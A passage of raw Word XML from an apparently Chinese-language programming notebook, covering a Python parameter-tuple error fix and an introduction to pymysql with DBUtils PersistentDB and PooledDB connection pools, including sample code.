      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.insert(l1=l1, l2=l2, compeleted=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4F57CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E84117" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.l2Update(l1=l1, l2=l2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1605AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20E443C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70089D74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    schedual_recovery = SchedualRecord()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158D5086" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # schedual_recovery.l2Insert('cn3/', 'NUC2/')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6956CF03" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # schedual_recovery.insert('com454/', 'l227/', 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425097FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # print(schedual_recovery.l2CompeleteSelect('com74/'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E3559F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    schedual_recovery.l1Compelete('cn322/')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34587BA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # print(schedual_recovery.l1CompeleteSelect())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418C3C56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # schedual_recovery.die()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF38F73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D31150" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="014BD813" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="522" w:name="_Toc159779961"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ValueError: parameters are of unsupported type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="522"/>
    </w:p>
    <w:p w14:paraId="55ACF23F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D62E35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def queryByCompelete(self, compelete=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B78BF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        sql = "select * from `record` where `compelete`=?;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398114A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>values = (compelete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28019ADE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        res_cur = self.cur.execute(sql, values)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609EEE78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        res = res_cur.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2F57CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47FDA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17DAF9FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B51E39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ValueError: parameters are of unsupported type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D555D34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE56E54" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更正方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C66F93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>(item) should be (item,) to make it a tuple.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B312D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE5F9E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="523" w:name="_Toc159779962"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pymysql+dbutils</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：数据库连接池</w:t>
      </w:r>
      <w:bookmarkEnd w:id="523"/>
    </w:p>
    <w:p w14:paraId="1AAFF353" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://webwareforpython.github.io/DBUtils/main.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B166EAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId153" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/xc_zhou/article/details/80893289</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56A0AD2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D207861" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两种连接模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B703B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">PersistentDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>：提供线程专用的数据库连接，并自动管理连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35159137" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">PooledDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>：提供线程间可共享的数据库连接，并自动管理连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1770C4BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C389E17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是查询数据，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cur.fetchone()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是看单行，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fetchall()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是取得全部数据的集合结果（单个元素是元组）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0315B5DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72EED37F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="524" w:name="_Toc159779963"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PersistentDB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="524"/>
    </w:p>
    <w:p w14:paraId="4F34A4C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>提供线程专用的数据库连接，并自动管理连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078DFF34" w14:textId="77777777" w:rsidR="00BA5915" w:rsidRDefault="00BA5915" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB093F3" w14:textId="77777777" w:rsidR="00BA5915" w:rsidRPr="00BA5915" w:rsidRDefault="00BA5915" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A23797" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="525" w:name="OLE_LINK26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import pymysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B78C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from dbutils.pooled_db import PooledDB</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="525"/>
    <w:p w14:paraId="7F94DA08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7D5527" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="526" w:name="OLE_LINK27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># from dbutils.persistent_db import PersistentDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F38708A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># mysql_pool = PersistentDB(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734240E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#     creator=pymysql,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC02DBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#     maxusage=None,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA78D72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#     ping=0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EA0377" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3493B6C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#     host='192.168.3.199',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D80C98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#     port=23306,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7867F94F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#     user='root',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D44096" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#     passwd='1qaz@WSX',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BEA21E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#     db='sca',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E3AC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A00E07F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#     charset='utf8',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB12E91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#     # maxconnections=None,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5466FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#     # blocking=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FFCA7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#     closeable=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E07B0F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># )</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="526"/>
    <w:p w14:paraId="381CDD3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465FF0AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="008044A6">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="527" w:name="_Toc159779964"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PooledDB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="527"/>
    </w:p>
    <w:p w14:paraId="69A131A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>提供线程间可共享的数据库连接，并自动管理连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1677CFDF" w14:textId="77777777" w:rsidR="005B2529" w:rsidRDefault="005B2529" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C739062" w14:textId="6685B948" w:rsidR="008D6E44" w:rsidRPr="00BA5915" w:rsidRDefault="008D6E44" w:rsidP="00BA5915">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pymysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dbutils.pooled_db </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PooledDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F58DA11" w14:textId="77777777" w:rsidR="008D6E44" w:rsidRDefault="008D6E44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67FAC9D4" w14:textId="1876C463" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql_pool = PooledDB(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1DB504" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
